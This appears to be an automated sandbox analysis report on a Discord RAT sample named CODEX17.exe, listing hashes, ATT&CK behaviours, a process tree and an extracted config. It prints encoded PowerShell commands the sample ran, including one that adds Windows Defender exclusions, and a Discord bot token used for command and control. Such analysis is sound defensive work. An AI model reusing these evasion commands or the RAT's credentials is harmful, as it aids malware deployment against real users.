Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
11-12-2024 14:17
Static task
static1
Behavioral task
behavioral1
Sample
CODEX17.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
CODEX17.exe
Resource
win10v2004-20241007-en
General
-
Target
CODEX17.exe
-
Size
307KB
-
MD5
53cc7337eed07bbbe0172f0b64bc6245
-
SHA1
9b0ac7e0eaffdb6ed8af1501939f40bd798f6be0
-
SHA256
1e5a4524dab6f1e4125043a7cdcfb6874c32a0514941ec4a90211f53efeef058
-
SHA512
ff2ec069d7877fdc646dfaaba4d9525ef71c04c93936accdd1bc1bfe9ab873ab27cceb9c2d34d25f3b3e6d4e6bb4ece707b797d2f5672d73583e21a361fb333d
-
SSDEEP
6144:m2EUicOFEG3AFDmDbpM6/XETGNNjyhRJNJC32XENQ8NvN:m2rOXTfpNg+
Malware Config
Extracted
discordrat
-
discord_token
MTMwODQxMjQ0MjIyODk1MzIwMA.GV9W16.iYVXo71VO-dFm-6aOmZjrpuYUGqFHWVGtkvM5Q
-
server_id
1316071968298111026
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Executes dropped EXE 1 IoCs
pid Process 2820 Client-built.exe -
Loads dropped DLL 6 IoCs
pid Process 2592 CODEX17.exe 2292 WerFault.exe 2292 WerFault.exe 2292 WerFault.exe 2292 WerFault.exe 2292 WerFault.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CODEX17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2108 powershell.exe 2284 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2592 wrote to memory of 2108 2592 CODEX17.exe 30 PID 2592 wrote to memory of 2108 2592 CODEX17.exe 30 PID 2592 wrote to memory of 2108 2592 CODEX17.exe 30 PID 2592 wrote to memory of 2108 2592 CODEX17.exe 30 PID 2592 wrote to memory of 2284 2592 CODEX17.exe 32 PID 2592 wrote to memory of 2284 2592 CODEX17.exe 32 PID 2592 wrote to memory of 2284 2592 CODEX17.exe 32 PID 2592 wrote to memory of 2284 2592 CODEX17.exe 32 PID 2592 wrote to memory of 2820 2592 CODEX17.exe 34 PID 2592 wrote to memory of 2820 2592 CODEX17.exe 34 PID 2592 wrote to memory of 2820 2592 CODEX17.exe 34 PID 2592 wrote to memory of 2820 2592 CODEX17.exe 34 PID 2820 wrote to memory of 2292 2820 Client-built.exe 35 PID 2820 wrote to memory of 2292 2820 Client-built.exe 35 PID 2820 wrote to memory of 2292 2820 Client-built.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAaABiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAaABoAG4AIwA+AA=="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQB0ACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2820 -s 5963⤵
- Loads dropped DLL
PID:2292
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
78KB
MD5eef37e61081aca867be51dab8d02c732
SHA1b58736f3eb07dedd144e61a8e38802de1c15b947
SHA256d74aed2a699c0ad2be01c761918ddcd5486bcf331a0a54a02bed4e073bdb39a8
SHA51208555aeb12b54264370e1e4154a7509efe21b84fbe5aa1fd4c322b22886a149adeaa3ff7e9b1b54f9c1ccd1dcc9ae32e5702c876b9ed1b58f63a9a1c61425078
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD533be2dcdbaf814b56fcf254b98ccd4b9
SHA140553bd037a0afb4f247759a83424f9bf3570e39
SHA25628f11dd0b5b11213fa68754a0f026ba6f372d9a6020d233681f993834df98aa5
SHA512d904c4aa36423d21833e1aa9c7f8f4f3df61c4d00b611445bd219488608750c8db2b4806a6a9eb715a94d9ab5b6c33e710c3250c69e1db9d24876a275fc52718